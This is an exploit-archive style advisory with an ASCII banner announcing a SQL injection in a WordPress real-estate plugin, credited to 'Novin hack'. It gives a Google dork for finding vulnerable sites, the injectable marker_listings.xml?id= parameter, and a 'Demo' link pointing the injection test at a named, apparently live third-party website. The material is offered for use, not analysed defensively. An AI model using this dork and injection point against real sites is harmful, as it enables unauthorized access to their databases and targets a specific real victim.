((|))((|)) ((|)) |)| (|)| |) ((|)) *********************** ((|)) ********************* * ((|)) * * *0* ((|)) * In the name of iran * * ((|)) * * -|- ((|)) ******************* | ((|)) ********* ((|))((|))((|))################((|))########################((|)) # Exploit Title: Wordpress fs-real-estate-plugin/ Theme SQL Injection ((|)) # Google Dork: inurl:/madebymilk/xml/marker_listings.xml ((|)) # Exploit Author: Novin hack # # Category: Web Application # # Tested on: Windows 7 # ###############################((|))############################# #******************************((|))****************************# #* Location: http://site.com/wp-content/ # #* /plugins/fs-real-estate-plugin/xml/ # #* marker_listings.xml?id=?[SQLi] # #* Demo: http://millanenterprises.com/wp-content/plugins/ # #* fs-real-estate-plugin/xml/marker_listings.xml?id=null' # #******************************((|))****************************# #******************************((|))****************************# #******************************((|))****************************# #* ***************** # #* * * # #* Greetz to: * Arash.F * # #* * * # #* ***************** # #* # #* #* # #* #* # #* #* # #* #* # #* #* # #*************************************************************** #*###############################################################